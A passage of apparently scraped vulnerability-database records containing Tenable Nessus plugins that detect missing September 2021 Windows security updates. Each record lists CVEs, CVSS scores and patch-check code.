attacker can exploit this to perform actions with the privileges of another user. (CVE-2021-36959)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-14T00:00:00", "type": "nessus", "title": "KB5005627: Windows 8.1 and Windows Server 2012 R2 September 2021 Security Update", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26435", "CVE-2021-36955", "CVE-2021-36958", "CVE-2021-36959", "CVE-2021-36960", "CVE-2021-36961", "CVE-2021-36962", "CVE-2021-36963", "CVE-2021-36964", "CVE-2021-36965", "CVE-2021-36969", "CVE-2021-36972", "CVE-2021-36974", "CVE-2021-38624", "CVE-2021-38628", "CVE-2021-38629", "CVE-2021-38630", "CVE-2021-38633", "CVE-2021-38635", "CVE-2021-38636", "CVE-2021-38638", "CVE-2021-38639", "CVE-2021-38667", "CVE-2021-38671", "CVE-2021-40444", "CVE-2021-40447"], "modified": "2022-08-22T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_SEP_5005613.NASL", "href": "https://www.tenable.com/plugins/nessus/153375", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(153375);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/08/22\");\n\n script_cve_id(\n \"CVE-2021-26435\",\n \"CVE-2021-36955\",\n \"CVE-2021-36958\",\n \"CVE-2021-36959\",\n \"CVE-2021-36960\",\n \"CVE-2021-36961\",\n \"CVE-2021-36962\",\n \"CVE-2021-36963\",\n \"CVE-2021-36964\",\n \"CVE-2021-36965\",\n \"CVE-2021-36969\",\n \"CVE-2021-36972\",\n \"CVE-2021-36974\",\n \"CVE-2021-38624\",\n \"CVE-2021-38628\",\n \"CVE-2021-38629\",\n \"CVE-2021-38630\",\n \"CVE-2021-38633\",\n \"CVE-2021-38635\",\n \"CVE-2021-38636\",\n \"CVE-2021-38638\",\n \"CVE-2021-38639\",\n \"CVE-2021-38667\",\n \"CVE-2021-38671\",\n \"CVE-2021-40444\",\n \"CVE-2021-40447\"\n );\n script_xref(name:\"IAVA\", value:\"2021-A-0429-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0431-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"MSKB\", value:\"5005613\");\n script_xref(name:\"MSKB\", value:\"5005627\");\n script_xref(name:\"MSFT\", value:\"MS21-5005613\");\n script_xref(name:\"MSFT\", value:\"MS21-5005627\");\n\n script_name(english:\"KB5005627: Windows 8.1 and Windows Server 2012 R2 September 2021 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5005627\nor cumulative update 5005613. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An memory corruption vulnerability exists. An attacker\n can exploit this to corrupt the memory and cause\n unexpected behaviors within the system/application.\n (CVE-2021-26435)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-36960, CVE-2021-36962,\n CVE-2021-36969, CVE-2021-36972, CVE-2021-38629,\n CVE-2021-38635, CVE-2021-38636)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-36965, \n CVE-2021-36958, CVE-2021-40444)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-36955, CVE-2021-36963, CVE-2021-36964,\n CVE-2021-36974, CVE-2021-38628, CVE-2021-38630,\n CVE-2021-38633, CVE-2021-38638, CVE-2021-38639,\n CVE-2021-38667, CVE-2021-38671, CVE-2021-40447)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-36961)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application.\n (CVE-2021-38624)\n\n - A session spoofing vulnerability exists. An attacker can\n exploit this to perform actions with the privileges of\n another user. (CVE-2021-36959)\");\n # https://support.microsoft.com/en-us/topic/september-14-2021-kb5005627-security-only-update-3404d598-7d6e-4007-93e8-49438460791f\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c74eba5d\");\n # https://support.microsoft.com/en-us/topic/september-14-2021-kb5005613-monthly-rollup-47b217aa-8d33-4b29-b444-77fcbe57410b\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?f099b11d\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB5005627 or Cumulative Update KB5005613.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-36958\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-36965\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Office Word Malicious MSHTML RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/09/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/09/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/09/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"false\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_func.inc');\ninclude('misc_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = \"MS21-09\";\nkbs = make_list('5005627', '5005613');\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nproductname = get_kb_item_or_exit('SMB/ProductName', exit_code:1);\nif (\"Windows 8\" >< productname && \"8.1\" >!< productname)\n audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.3\",\n sp:0,\n rollup_date:'09_2021',\n bulletin:bulletin,\n rollup_kb_list:[5005627, 5005613])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:54:48", "description": "The remote Windows host is missing security update 5005569.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An memory corruption vulnerability exists. An attacker can exploit this to corrupt the memory and cause unexpected behaviors within the system/application.\n (CVE-2021-26435)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-36960, CVE-2021-36962, CVE-2021-36969, CVE-2021-36972, CVE-2021-38629, CVE-2021-38635, CVE-2021-38636)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-36955, CVE-2021-36963, CVE-2021-36964, CVE-2021-36967, CVE-2021-36973, CVE-2021-36974, CVE-2021-38628, CVE-2021-38630, CVE-2021-38633, CVE-2021-38634, CVE-2021-38638, CVE-2021-38639, CVE-2021-38667, CVE-2021-38671, CVE-2021-40447)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-36965, CVE-2021-36958, CVE-2021-40444)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2021-36961)\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application.\n (CVE-2021-38624)\n\n - A session spoofing vulnerability exists. An attacker can exploit this to perform actions with the privileges of another user. (CVE-2021-36959)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-14T00:00:00", "type": "nessus", "title": "KB5005569: Windows 10 version 1507 LTS September 2021 Security Update", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26435", "CVE-2021-36955", "CVE-2021-36958", "CVE-2021-36959", "CVE-2021-36960", "CVE-2021-36961", "CVE-2021-36962", "CVE-2021-36963", "CVE-2021-36964", "CVE-2021-36965", "CVE-2021-36967", "CVE-2021-36969", "CVE-2021-36972", "CVE-2021-36973", "CVE-2021-36974", "CVE-2021-38624", "CVE-2021-38628", "CVE-2021-38629", "CVE-2021-38630", "CVE-2021-38633", "CVE-2021-38634", "CVE-2021-38635", "CVE-2021-38636", "CVE-2021-38638", "CVE-2021-38639", "CVE-2021-38667", "CVE-2021-38671", "CVE-2021-40444", "CVE-2021-40447"], "modified": "2022-08-22T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_SEP_5005569.NASL", "href": "https://www.tenable.com/plugins/nessus/153372", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(153372);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/08/22\");\n\n script_cve_id(\n \"CVE-2021-26435\",\n \"CVE-2021-36955\",\n \"CVE-2021-36958\",\n \"CVE-2021-36959\",\n \"CVE-2021-36960\",\n \"CVE-2021-36961\",\n \"CVE-2021-36962\",\n \"CVE-2021-36963\",\n \"CVE-2021-36964\",\n \"CVE-2021-36965\",\n \"CVE-2021-36967\",\n \"CVE-2021-36969\",\n \"CVE-2021-36972\",\n \"CVE-2021-36973\",\n \"CVE-2021-36974\",\n \"CVE-2021-38624\",\n \"CVE-2021-38628\",\n \"CVE-2021-38629\",\n \"CVE-2021-38630\",\n \"CVE-2021-38633\",\n \"CVE-2021-38634\",\n \"CVE-2021-38635\",\n \"CVE-2021-38636\",\n \"CVE-2021-38638\",\n \"CVE-2021-38639\",\n \"CVE-2021-38667\",\n \"CVE-2021-38671\",\n \"CVE-2021-40444\",\n \"CVE-2021-40447\"\n );\n script_xref(name:\"MSKB\", value:\"5005569\");\n script_xref(name:\"MSFT\", value:\"MS21-5005569\");\n script_xref(name:\"IAVA\", value:\"2021-A-0431-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0429-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"KB5005569: Windows 10 version 1507 LTS September 2021 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5005569.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An memory corruption vulnerability exists. An attacker\n can exploit this to corrupt the memory and cause\n unexpected behaviors within the system/application.\n (CVE-2021-26435)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-36960, CVE-2021-36962,\n CVE-2021-36969, CVE-2021-36972, CVE-2021-38629,\n CVE-2021-38635, CVE-2021-38636)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-36955, CVE-2021-36963, CVE-2021-36964,\n CVE-2021-36967, CVE-2021-36973, CVE-2021-36974,\n CVE-2021-38628, CVE-2021-38630, CVE-2021-38633,\n CVE-2021-38634, CVE-2021-38638, CVE-2021-38639,\n CVE-2021-38667, CVE-2021-38671, CVE-2021-40447)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-36965,\n CVE-2021-36958, CVE-2021-40444)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-36961)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application.\n (CVE-2021-38624)\n\n - A session spoofing vulnerability exists. An attacker can\n exploit this to perform actions with the privileges of\n another user. (CVE-2021-36959)\");\n # https://support.microsoft.com/en-us/topic/september-14-2021-kb5005569-os-build-10240-19060-0de156d8-d616-49bb-ad8d-3cf352611ca4\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?322a809c\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB5005569.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-36958\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-36965\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Office Word Malicious MSHTML RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/09/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/09/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/09/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"false\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_func.inc');\ninclude('misc_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = \"MS21-09\";\nkbs = make_list('5005569');\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:'10240',\n rollup_date:'09_2021',\n bulletin:bulletin,\n rollup_kb_list:[5005569])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:55:12", "description": "The remote Windows host is missing security update 5005573.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An memory corruption vulnerability exists. An attacker can exploit this to corrupt the memory and cause unexpected behaviors within the system/application.\n (CVE-2021-26435)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-36960, CVE-2021-36962, CVE-2021-36969, CVE-2021-36972, CVE-2021-38629, CVE-2021-38635, CVE-2021-38636)\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application.\n (CVE-2021-38624, CVE-2021-38632)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-36955, CVE-2021-36963, CVE-2021-36964, CVE-2021-36967, CVE-2021-36973, CVE-2021-36974, CVE-2021-38628, CVE-2021-38630, CVE-2021-38633, CVE-2021-38634, CVE-2021-38638, CVE-2021-38639, CVE-2021-38667, CVE-2021-38671, CVE-2021-40447)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-36965, CVE-2021-36958, CVE-2021-40444)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2021-36961)\n\n - A session spoofing vulnerability exists. An attacker can exploit this to perform actions with the privileges of another user. (CVE-2021-36959)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-14T00:00:00", "type": "nessus", "title": "KB5005573: Windows 10 Version 1607 and Windows Server 2016 September 2021 Security Update", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26435", "CVE-2021-36955", "CVE-2021-36958", "CVE-2021-36959", "CVE-2021-36960", "CVE-2021-36961", "CVE-2021-36962", "CVE-2021-36963", "CVE-2021-36964", "CVE-2021-36965", "CVE-2021-36967", "CVE-2021-36969", "CVE-2021-36972", "CVE-2021-36973", "CVE-2021-36974", "CVE-2021-38624", "CVE-2021-38628", "CVE-2021-38629", "CVE-2021-38630", "CVE-2021-38632", "CVE-2021-38633", "CVE-2021-38634", "CVE-2021-38635", "CVE-2021-38636", "CVE-2021-38638", "CVE-2021-38639", "CVE-2021-38667", "CVE-2021-38671", "CVE-2021-40444", "CVE-2021-40447"], "modified": "2022-08-22T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_SEP_5005573.NASL", "href": "https://www.tenable.com/plugins/nessus/153377", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(153377);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/08/22\");\n\n script_cve_id(\n \"CVE-2021-26435\",\n \"CVE-2021-36955\",\n \"CVE-2021-36958\",\n \"CVE-2021-36959\",\n \"CVE-2021-36960\",\n \"CVE-2021-36961\",\n \"CVE-2021-36962\",\n \"CVE-2021-36963\",\n \"CVE-2021-36964\",\n \"CVE-2021-36965\",\n \"CVE-2021-36967\",\n \"CVE-2021-36969\",\n \"CVE-2021-36972\",\n \"CVE-2021-36973\",\n \"CVE-2021-36974\",\n \"CVE-2021-38624\",\n \"CVE-2021-38628\",\n \"CVE-2021-38629\",\n \"CVE-2021-38630\",\n \"CVE-2021-38632\",\n \"CVE-2021-38633\",\n \"CVE-2021-38634\",\n \"CVE-2021-38635\",\n \"CVE-2021-38636\",\n \"CVE-2021-38638\",\n \"CVE-2021-38639\",\n \"CVE-2021-38667\",\n \"CVE-2021-38671\",\n \"CVE-2021-40444\",\n \"CVE-2021-40447\"\n );\n script_xref(name:\"MSKB\", value:\"5005573\");\n script_xref(name:\"MSFT\", value:\"MS21-5005573\");\n script_xref(name:\"IAVA\", value:\"2021-A-0431-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0429-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"KB5005573: Windows 10 Version 1607 and Windows Server 2016 September 2021 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5005573.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An memory corruption vulnerability exists. An attacker\n can exploit this to corrupt the memory and cause\n unexpected behaviors within the system/application.\n (CVE-2021-26435)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-36960, CVE-2021-36962,\n CVE-2021-36969, CVE-2021-36972, CVE-2021-38629,\n CVE-2021-38635, CVE-2021-38636)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application.\n (CVE-2021-38624, CVE-2021-38632)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-36955, CVE-2021-36963, CVE-2021-36964,\n CVE-2021-36967, CVE-2021-36973, CVE-2021-36974,\n CVE-2021-38628, CVE-2021-38630, CVE-2021-38633,\n CVE-2021-38634, CVE-2021-38638, CVE-2021-38639,\n CVE-2021-38667, CVE-2021-38671, CVE-2021-40447)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-36965,\n CVE-2021-36958, CVE-2021-40444)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-36961)\n\n - A session spoofing vulnerability exists. An attacker can\n exploit this to perform actions with the privileges of\n another user. (CVE-2021-36959)\");\n # https://support.microsoft.com/en-us/topic/september-14-2021-kb5005573-os-build-14393-4651-48853795-3857-4485-a2bf-f15b39464b41\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?be42cfd3\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB5005573.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-36958\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-36965\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Office Word Malicious MSHTML RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/09/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/09/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/09/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"false\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_func.inc');\ninclude('misc_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = \"MS21-09\";\nkbs = make_list('5005573');\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = 